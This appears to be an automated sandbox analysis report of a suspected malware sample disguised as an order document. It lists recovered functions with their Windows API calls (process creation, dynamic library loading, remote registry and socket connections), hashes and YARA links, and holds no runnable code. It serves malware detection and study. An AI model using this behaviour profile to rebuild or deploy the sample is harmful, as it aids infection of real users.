Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 27703f750c254b8df19cde0fe7a16eb874166500f6a25c600e85877b7e532df2
Instruction ID: 829f495f47ef218ad7d12fc0482335a0f9b2c0f30f702a8be16dcec9d61f0c8a
Opcode Fuzzy Hash: 27703f750c254b8df19cde0fe7a16eb874166500f6a25c600e85877b7e532df2
Instruction Fuzzy Hash: 8A1172716002096BCF15BF619CC5FAA3778AF49718F00907BFA09BA182DB789645DB78

Function 00427A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00427AD8

Part of subcall function 00427CF4: __mtinitlocknum.LIBCMT ref: 00427D06
Part of subcall function 00427CF4: EnterCriticalSection.KERNEL32(00000000,?,00427ADD,0000000D), ref: 00427D1F

InterlockedIncrement.KERNEL32(?), ref: 00427AE5
__lock.LIBCMT ref: 00427AF9
___addlocaleref.LIBCMT ref: 00427B17

Strings

`H, xrefs: 00427AA3

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `H
API String ID: 1687444384-912421188
Opcode ID: 9c391c81e9dda691e28eee64fa7d0ba00185fd93005869b510abeebd1aa148ee
Instruction ID: 1797e7fad8e162582fd59431b3014d95c8bf93bc8725d16659cd3889e7a519e1
Opcode Fuzzy Hash: 9c391c81e9dda691e28eee64fa7d0ba00185fd93005869b510abeebd1aa148ee
Instruction Fuzzy Hash: 1D016171604710DFD720DF76E90574ABBF0AF50329F60890FA496972A0CBB8A644CB59

Function 0046E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046E33D
_memset.LIBCMT ref: 0046E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C3D00,004C3D44), ref: 0046E37B
CloseHandle.KERNEL32 ref: 0046E38D

Strings

D=L, xrefs: 0046E346

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=L
API String ID: 3277943733-2639313163
Opcode ID: 9cdb3eb17ab4b92b591a418dd0827165d4bfee49c7ed39e47b44089da6596004
Instruction ID: 1dc04ddbbd56b6e1bfcd3b76fe9272b6450bf468c53a2e9cb482092a9c0dbf5b
Opcode Fuzzy Hash: 9cdb3eb17ab4b92b591a418dd0827165d4bfee49c7ed39e47b44089da6596004
Instruction Fuzzy Hash: 20F0BEF0601310BAE2502F61BC05FBB3EACDB04756F008436BE0AD61A2D3799E0087AC

Function 00461945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004619F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00461A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00461B49
CloseHandle.KERNEL32(?), ref: 00461BBF

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 9282f24e6ff8530c23ddd74a7ce06cdb5885e117eb99833be6355047d1ea841d
Instruction ID: 2bdb186c9e029468b938e76092bf29530639fde0365ee340ce212a0d3725281c
Opcode Fuzzy Hash: 9282f24e6ff8530c23ddd74a7ce06cdb5885e117eb99833be6355047d1ea841d
Instruction Fuzzy Hash: 94816570600204ABDF10DF65C886BAEBBE5AF04714F18845EF905AF3D2E7B8A941CB95

Function 00441C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00441CB4
VariantClear.OLEAUT32(00000013), ref: 00441D26
VariantClear.OLEAUT32(00000000), ref: 00441D81
VariantClear.OLEAUT32(?), ref: 00441DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00441E26

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: c23e8023e6880c8b8df82b171dba115a25a693234c554f2165ca5545aaa9f89a
Instruction ID: 7786f43c6c60c0f1960bf112e7c66a9551d9e0e8f2c73cbc967b60c5b7ff2521
Opcode Fuzzy Hash: c23e8023e6880c8b8df82b171dba115a25a693234c554f2165ca5545aaa9f89a
Instruction Fuzzy Hash: BE5179B5A00209AFDB10CF58C880AAAB7B9FF4C314B15855AED59DB350D334EA41CFA4

Function 00460688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004606EE
GetProcAddress.KERNEL32(00000000,?), ref: 0046077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0046079B
GetProcAddress.KERNEL32(00000000,?), ref: 004607E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 004607FB

Part of subcall function 0041E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0044A574,?,?,00000000,00000008), ref: 0041E675
Part of subcall function 0041E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0044A574,?,?,00000000,00000008), ref: 0041E699

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 7e974794b9ebcf7644e118669091014843e614acbdd884541301673f92c5cb14
Instruction ID: 87febcb3e1d6037208c0937028248e6385403b15d7085c17ee78e3048b04f42a
Opcode Fuzzy Hash: 7e974794b9ebcf7644e118669091014843e614acbdd884541301673f92c5cb14
Instruction Fuzzy Hash: F1516E75A00205DFCB04EFA9C485DAEB7B5BF18314B04806AE905AB391EB38ED45CF89

Function 00462E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00462EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00462F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00462F75
RegCloseKey.ADVAPI32(?,?), ref: 00462FA1
RegCloseKey.ADVAPI32(00000000), ref: 00462FAE

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: c8515245b16fd5d09797e9a9146549c76df087fdde7285a1590f81fa609b5e39
Instruction ID: f2e41662885f165f18e384d2a40cd3da89a2193350d58dfc2c6ca3ce7a760dd9
Opcode Fuzzy Hash: c8515245b16fd5d09797e9a9146549c76df087fdde7285a1590f81fa609b5e39
Instruction Fuzzy Hash: 48518B71608204AFD704EF64C981E6BB7F8FF88308F00492EF59597291EB78E905DB5A

Function 0046CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3613b4608069b40bf596ac55c2128bcb6c0c8de1016511874f18f6ea65a5751e
Instruction ID: 09529bc7e3110235e9e6e45ecf7d8fa4ad648c899c66dbd7154b48755ec01ae1
Opcode Fuzzy Hash: 3613b4608069b40bf596ac55c2128bcb6c0c8de1016511874f18f6ea65a5751e
Instruction Fuzzy Hash: CA41B339E01104ABD714DF68CC84FBABB74EB09310F140236E999A72E1E739AD11969A

Function 00451206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004512B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004512DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0045131C

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00451341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00451349

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 745e8af2c8a30260d11a2f139f3fe93f5d4de3b0e529c75e1797880a93a2b48e
Instruction ID: 710539193e7f1d8fb549b37adceebc83b926d8c979f1569505f486b0f8da61be
Opcode Fuzzy Hash: 745e8af2c8a30260d11a2f139f3fe93f5d4de3b0e529c75e1797880a93a2b48e
Instruction Fuzzy Hash: 0F414C35A00105DFDB01EF65C981AAEBBF5FF08314B1480AAE946AB3A2DB35ED01DF54

Function 0043B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0043B369
PostMessageW.USER32(?,00000201,00000001), ref: 0043B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0043B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0043B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0043B431

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: d17ea4044e2045b9c16e98e0df8e21c289d5939ccdd835b3e45b18eb1401e770
Instruction ID: e5f01e0ccbb0feccb883e1297f79fe71a552ab19b66adbfd7133fe0b7bbb2f95
Opcode Fuzzy Hash: d17ea4044e2045b9c16e98e0df8e21c289d5939ccdd835b3e45b18eb1401e770
Instruction Fuzzy Hash: 5731AE7190022DEBDF04CF68DD4DB9E7BB5EB08319F10462AFA21AA2D1C3B49954CB95

Function 0043DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0043DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0043DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0043DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0043DC52
_wcsstr.LIBCMT ref: 0043DC5C

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: a794f66c915fbd57c4909ec50b061da08dbf62a82d0dd86a98add32000dcff59
Instruction ID: 22629a0e4b8d2ceb4bff886f9726b3e533dde48c58e468b86331f4b7c5adb18c
Opcode Fuzzy Hash: a794f66c915fbd57c4909ec50b061da08dbf62a82d0dd86a98add32000dcff59
Instruction Fuzzy Hash: A2213771A04104BBEB155B39AC49E7F7BA8DF49710F10903FF809DA191EAA9DC41D3A8

Function 0046DE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetWindowLongW.USER32(?,000000F0), ref: 0046DEB0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0046DED4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0046DEEC
GetSystemMetrics.USER32(00000004), ref: 0046DF14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00453A1E,00000000), ref: 0046DF32

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 76aa220ca3784460e45bd9e6711317d84ace2a45b19ebb5a36d2736da02da121
Instruction ID: df32e590a290ce3bbc4f26b9be6dc5930597ccd0c8da9ec831a37981ed3a1c5a
Opcode Fuzzy Hash: 76aa220ca3784460e45bd9e6711317d84ace2a45b19ebb5a36d2736da02da121
Instruction Fuzzy Hash: 4F21C131F11616AFCB244F78CC44B6A3794FB15724F15073AF926CA2E0E7349861CB89

Function 0043BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0043BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0043BCC2
__itow.LIBCMT ref: 0043BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0043BD00
__itow.LIBCMT ref: 0043BD11

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: db692809dc60a942853b210d65d93de4cfde56d02dc74aab5678215f32d867fe
Instruction ID: 3ff0eca8595b0e8cc932446e134a016a3cae24b5f552021415e5118c315c07d1
Opcode Fuzzy Hash: db692809dc60a942853b210d65d93de4cfde56d02dc74aab5678215f32d867fe
Instruction Fuzzy Hash: 9021D731B002187ADB20AA659C45FDF7B68EF4D354F10203EFA06EB1C1EB78894587E9

Function 00446318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 004050E6: _wcsncpy.LIBCMT ref: 004050FA

GetFileAttributesW.KERNEL32(?,?,?,?,004460C3), ref: 00446369
GetLastError.KERNEL32(?,?,?,004460C3), ref: 00446374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004460C3), ref: 00446388
_wcsrchr.LIBCMT ref: 004463AA

Part of subcall function 00446318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004460C3), ref: 004463E0

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: eec144002fa54551e57bd01bd666ecf60c0fb7f6026f1ee6ff66481aa4da2889
Instruction ID: e2e5c400610b8dad56117f9b5beb12c84386859fb76420c5d936f92795e9889b
Opcode Fuzzy Hash: eec144002fa54551e57bd01bd666ecf60c0fb7f6026f1ee6ff66481aa4da2889
Instruction Fuzzy Hash: 6B212630A042145AFB24AE74AC42FEF23ACAF06360F11047FF805C31C1EB6899858A5E

Function 00458B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00458BD3
WSAGetLastError.WSOCK32(00000000), ref: 00458BE2
connect.WSOCK32(00000000,?,00000010), ref: 00458BFE

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 822bd67af5b21315d4a58d27a51d58b89f2d7ba38396fa916d0a561f55ec1a63
Instruction ID: abb2c2ea28d5de88bdee0dc417e74f9f20a9303d66739d36d785107e4a3282d2
Opcode Fuzzy Hash: 822bd67af5b21315d4a58d27a51d58b89f2d7ba38396fa916d0a561f55ec1a63
Instruction Fuzzy Hash: 5C21DE316002009FCB10AF28C885B7E73A9AF48714F04446EF902AB3D2CF78AC058B69

Function 00458420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00458441
GetForegroundWindow.USER32 ref: 00458458
GetDC.USER32(00000000), ref: 00458494
GetPixel.GDI32(00000000,?,00000003), ref: 004584A0
ReleaseDC.USER32(00000000,00000003), ref: 004584DB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
